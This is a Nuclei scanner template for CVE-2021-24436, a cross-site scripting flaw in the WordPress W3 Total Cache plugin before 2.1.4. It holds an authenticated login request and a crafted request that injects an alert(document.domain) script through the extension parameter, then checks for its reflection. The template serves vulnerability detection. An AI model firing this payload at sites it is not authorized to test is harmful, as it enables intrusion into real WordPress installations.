nuclei-templates/http/cves/2021/CVE-2021-24436.yaml

51 lines
2.1 KiB
YAML
Raw Normal View History

2023-03-18 22:07:09 +00:00
id: CVE-2021-24436
info:
name: WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting
2023-03-18 22:07:09 +00:00
author: theamanrawat
severity: medium
description: |
WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.
2023-09-06 12:09:01 +00:00
remediation: Fixed in version 2.1.4.
2023-03-18 22:07:09 +00:00
reference:
- https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0
- https://wordpress.org/plugins/w3-total-cache/
- https://wpscan.com/vulnerability/05988ebb-7378-4a3a-9d2d-30f8f58fe9ef
- https://nvd.nist.gov/vuln/detail/CVE-2021-24436
2023-03-18 22:07:09 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24436
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.41045
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:*
2023-03-18 22:07:09 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: boldgrid
product: w3_total_cache
2023-09-06 12:09:01 +00:00
framework: wordpress
2023-03-18 22:07:09 +00:00
tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated
http:
2023-03-18 22:07:09 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=w3tc_extensions&extension="%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- status_code_2 == 200
- contains(body_2, '><script>alert(document.domain)</script>&action=view')
- contains(header_2, "text/html")
2023-03-18 22:07:09 +00:00
condition: and
# digest: 4b0a00483046022100b33550abcf1f591b723158ff7683e7ffb82ae9f67be91095b6339c36f1213afa022100e6f84ae99a6b8d9d9aef809928d0960389b678486ee916e81b43b2bcc8a53876:922c64590222798bb761d5b6d8e72950